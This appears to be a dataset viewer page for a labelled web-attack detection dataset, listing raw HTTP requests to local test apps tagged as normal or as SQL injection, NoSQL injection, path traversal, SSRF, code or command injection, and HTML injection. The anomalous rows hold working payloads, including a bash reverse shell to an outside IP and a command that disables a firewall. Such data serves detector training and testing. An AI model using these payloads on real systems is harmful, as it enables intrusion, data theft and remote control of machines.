Dataset Viewer
Auto-converted to Parquet Duplicate
raw_request
stringlengths
2
1.93k
label
stringclasses
2 values
attack_type
stringclasses
11 values
GET /api/Challenges HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Android 11; Mobile; rv:89.0) Gecko/89.0 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cache-Control: max-age=0 Referer: http://127.0.0.1:3000/products
normal
Normal
GET /api/Challenges HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Accept-Language: en-US,en;q=0.9 X-Attack-Type: SSRF X-Forwarded-For: file:///etc/network/interfaces
anomalous
Server-Side Request Forgery
GET /api/products HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cache-Control: max-age=0
normal
Normal
GET /api/Challenges?page=apple HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Android 11; Mobile; rv:89.0) Gecko/89.0 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cache-Control: max-age=0 Referer: http://127.0.0.1:3000/account
normal
Normal
GET /api/SecurityQuestions HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Accept-Language: en-US,en;q=0.9 X-Attack-Type: SSRF X-Custom-Header: http://customer3-app-7f000101.nip.io/
anomalous
Server-Side Request Forgery
GET /products HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Accept-Language: en-US,en;q=0.9 X-Attack-Type: HTML X-Custom-Header: <fOnT><h1 StYlE="cOlOr:rEd;">dEfAcEd</H1>
anomalous
HTML Injection
GET /api/Challenges?page=apple HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cache-Control: max-age=0 Referer: http://127.0.0.1:3000/account
normal
Normal
GET /rest/products/search HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cache-Control: max-age=0
normal
Normal
GET /api/Quantitys HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Accept-Language: en-US,en;q=0.9 X-Attack-Type: LFI Referer: %%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65//etc/passwd
anomalous
Local File Inclusion
GET /rest/captcha?q=drink HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cache-Control: max-age=0 Referer: http://127.0.0.1:3000/account
normal
Normal
GET /account HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Accept-Language: en-US,en;q=0.9 X-Attack-Type: RCE Referer: shell_exec($_GET[1], 'r');#
anomalous
Remote Code Execution
GET /rest/memories HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Accept-Language: en-US,en;q=0.9 X-Attack-Type: SSRF Referer: http://[::1]:22/
anomalous
Server-Side Request Forgery
GET /api/products HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Accept-Language: en-US,en;q=0.9 X-Attack-Type: RCE X-Forwarded-For: system("bash -i >& /dev/tcp/10.10.14.1/4444 0>&1");*/
anomalous
Remote Code Execution
GET /rest/captcha?q=drink HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cache-Control: max-age=0 Referer: http://127.0.0.1:3000/products
normal
Normal
POST /rest/products/search HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Accept-Language: en-US,en;q=0.9 X-Attack-Type: SQL Content-Type: application/json Content-Length: 171 {"q": "UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--"}
anomalous
SQL Injection
POST /rest/captcha HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit/605.1.15 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cache-Control: max-age=0 Content-Type: application/json {"q":"apple"}
normal
Normal
POST /rest/products/search HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Accept-Language: en-US,en;q=0.9 X-Attack-Type: SQL Content-Type: application/json Content-Length: 55 {"q": "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5--"}
anomalous
SQL Injection
GET /account HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Accept-Language: en-US,en;q=0.9 X-Attack-Type: RCE Referer: exec($_GET[c], 'r');#
anomalous
Remote Code Execution
GET /DVWA/vulnerabilities/exec/?ip=%3B%20netsh%20firewall%20set%20opmode%20disable&Submit=Submit HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Accept-Language: en-US,en;q=0.9 X-Attack-Type: COMMAND Cookie: PHPSESSID=ijck02bs4j60p2couoqs7mmq87; security=low
anomalous
Command Injection
GET /account?search=melon HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cache-Control: max-age=0
normal
Normal
GET /api/products?id=%2500 HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Accept-Language: en-US,en;q=0.9 X-Attack-Type: SQL
anomalous
SQL Injection
GET /profile HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: token[$nin]=false Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Accept-Language: en-US,en;q=0.9 X-Attack-Type: NOSQL
anomalous
NoSQL Injection
GET /rest/user/whoami?search=drink HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cache-Control: max-age=0
normal
Normal
GET /rest/captcha HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cache-Control: max-age=0 Referer: http://127.0.0.1:3000/account
normal
Normal
GET /vulnerabilities/exec/?ip=%3B%20perl%20-e%20%27print%20%22X%22x4096%27&Submit=Submit HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Accept-Language: en-US,en;q=0.9 X-Attack-Type: COMMAND Cookie: security=low; PHPSESSID=ijck02bs4j60p2couoqs7mmq87; security=low
anomalous
Command Injection
GET /search HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cache-Control: max-age=0 Referer: http://127.0.0.1:3000/products
normal
Normal
GET /search HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cache-Control: max-age=0
normal
Normal
GET /api/products HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Accept-Language: en-US,en;q=0.9 X-Attack-Type: RCE X-Forwarded-For: call_user_func_array($_GET[c]);|
anomalous
Remote Code Execution
GET /api/products HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Accept-Language: en-US,en;q=0.9 X-Attack-Type: RCE X-Forwarded-For: exec($_GET[0], '/*r'/*);
anomalous
Remote Code Execution
POST /api/Challenges HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cache-Control: max-age=0 Referer: http://127.0.0.1:3000/products
normal
Normal
GET /rest/products/search?q=melon HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cache-Control: max-age=0
normal
Normal
GET /settings HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Accept-Language: en-US,en;q=0.9 X-Attack-Type: LFI X-Forwarded-For: ..%u2215..%u2215..%u2215/etc/passwd
anomalous
Local File Inclusion
POST /api/products HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit/605.1.15 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cache-Control: max-age=0 Referer: http://127.0.0.1:3000/products
normal
Normal
GET /profile HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: {"$gt": true} Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Accept-Language: en-US,en;q=0.9 X-Attack-Type: NOSQL
anomalous
NoSQL Injection
GET /api/Challenges HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Accept-Language: en-US,en;q=0.9 X-Attack-Type: SSRF X-Forwarded-For: https://[::1]:25/
anomalous
Server-Side Request Forgery
GET /profile HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: passthru($_SERVER['*/HTTP_CMD'*/]); Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Accept-Language: en-US,en;q=0.9 X-Attack-Type: RCE
anomalous
Remote Code Execution
POST /api/products HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Accept-Language: en-US,en;q=0.9 X-Attack-Type: LFI Cookie: .../.../.../...//etc/passwd Content-Length: 0
anomalous
Local File Inclusion
PUT /rest/basket/ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21 HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Accept-Language: en-US,en;q=0.9 X-Attack-Type: SQL Content-Length: 0
anomalous
SQL Injection
GET /api/Quantitys HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Accept-Language: en-US,en;q=0.9 X-Attack-Type: NOSQL X-Custom-Header: username[$in]=null
anomalous
NoSQL Injection
GET /rest/products/search HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cache-Control: max-age=0
normal
Normal
POST /api/Challenges HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Accept-Language: en-US,en;q=0.9 X-Attack-Type: RCE Cookie: eval($_REQUEST['cmd'], 'r');%0a Content-Length: 0
anomalous
Remote Code Execution
GET /rest/products/search?q=ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%23 HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Accept-Language: en-US,en;q=0.9 X-Attack-Type: SQL
anomalous
SQL Injection
GET /api/SecurityAnswers HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Accept-Language: en-US,en;q=0.9 X-Attack-Type: LFI X-Custom-Header: %c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\/etc/passwd
anomalous
Local File Inclusion
GET /account HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cache-Control: max-age=0 Referer: http://127.0.0.1:3000/account
normal
Normal
GET /api/products?id=ORDER%20BY%201%2CSLEEP%285%29%2CBENCHMARK%281000000%2CMD5%28%27A%27%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%23 HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Accept-Language: en-US,en;q=0.9 X-Attack-Type: SQL
anomalous
SQL Injection
GET /rest/captcha HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cache-Control: max-age=0 Referer: http://127.0.0.1:3000/products
normal
Normal
GET /account?page=lemon HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Android 11; Mobile; rv:89.0) Gecko/89.0 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cache-Control: max-age=0 Referer: http://127.0.0.1:3000/products
normal
Normal
GET /account HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: https://2130706433:8080/ Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Accept-Language: en-US,en;q=0.9 X-Attack-Type: SSRF
anomalous
Server-Side Request Forgery
GET /rest/captcha HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Android 11; Mobile; rv:89.0) Gecko/89.0 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cache-Control: max-age=0 Referer: http://127.0.0.1:3000/products
normal
Normal
POST /products HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cache-Control: max-age=0 Referer: http://127.0.0.1:3000/search
normal
Normal
POST /products HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cache-Control: max-age=0 Content-Type: application/json {"q":"melon"}
normal
Normal
GET /api/system/cmd?command=%26%20dir%20C%3A%5CUsers HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Accept-Language: en-US,en;q=0.9 X-Attack-Type: COMMAND Cookie: PHPSESSID=ijck02bs4j60p2couoqs7mmq87; security=low
anomalous
Command Injection
GET /api/SecurityAnswers HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Accept-Language: en-US,en;q=0.9 X-Attack-Type: LFI X-Custom-Header: ..\\\/etc/passwd
anomalous
Local File Inclusion
GET /api/Challenges?q=banana HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Android 11; Mobile; rv:89.0) Gecko/89.0 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cache-Control: max-age=0 Referer: http://127.0.0.1:3000/search
normal
Normal
GET /search HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cache-Control: max-age=0 Referer: http://127.0.0.1:3000/search
normal
Normal
GET /rest/products/search?search=apple HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit/605.1.15 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cache-Control: max-age=0 Referer: http://127.0.0.1:3000/products
normal
Normal
GET /rest/products/search?q=ORDER%20BY%2019%23 HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Accept-Language: en-US,en;q=0.9 X-Attack-Type: SQL
anomalous
SQL Injection
GET /api/SecurityAnswers HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Accept-Language: en-US,en;q=0.9 X-Attack-Type: LFI X-Custom-Header: %252e%252e//etc/passwd;index.html
anomalous
Local File Inclusion
POST /api/products?page=melon HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cache-Control: max-age=0 Referer: http://127.0.0.1:3000/account
normal
Normal
GET /account?q=fruit HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Android 11; Mobile; rv:89.0) Gecko/89.0 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cache-Control: max-age=0
normal
Normal
GET /api/Challenges?page=orange HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cache-Control: max-age=0
normal
Normal
POST /rest/products/search HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Accept-Language: en-US,en;q=0.9 X-Attack-Type: SQL Content-Type: application/json Content-Length: 92 {"q": "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#"}
anomalous
SQL Injection
GET /settings HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Accept-Language: en-US,en;q=0.9 X-Attack-Type: LFI X-Forwarded-For: %c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af/etc/passwd
anomalous
Local File Inclusion
GET /api/Challenges HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Accept-Language: en-US,en;q=0.9 X-Attack-Type: SSRF X-Forwarded-For: file://2130706433:22/
anomalous
Server-Side Request Forgery
GET /api/Challenges HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cache-Control: max-age=0 Referer: http://127.0.0.1:3000/account
normal
Normal
POST /rest/user/whoami HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Accept-Language: en-US,en;q=0.9 X-Attack-Type: HTML Cookie: <strong>Juice Shop Injected Content-Length: 0
anomalous
HTML Injection
GET /api/products HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit/605.1.15 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cache-Control: max-age=0 Referer: http://127.0.0.1:3000/account
normal
Normal
GET /api/Challenges?page=orange HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cache-Control: max-age=0 Referer: http://127.0.0.1:3000/products
normal
Normal
GET /search?page=orange HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cache-Control: max-age=0
normal
Normal
GET /api/Quantitys HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Accept-Language: en-US,en;q=0.9 X-Attack-Type: LFI Referer: %2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd;index.html
anomalous
Local File Inclusion
POST /products?page=lemon HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cache-Control: max-age=0
normal
Normal
POST /api/system/exec HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Accept-Language: en-US,en;q=0.9 X-Attack-Type: COMMAND Content-Type: application/json Cookie: PHPSESSID=ijck02bs4j60p2couoqs7mmq87; security=low Content-Length: 25 {"command": "; ifconfig"}
anomalous
Command Injection
GET /api/products?id=ORDER%20BY%2022%23 HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Accept-Language: en-US,en;q=0.9 X-Attack-Type: SQL
anomalous
SQL Injection
GET /login.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Accept-Language: en-US,en;q=0.9 X-Attack-Type: COMMAND Cookie: PHPSESSID=ijck02bs4j60p2couoqs7mmq87; security=low
anomalous
Command Injection
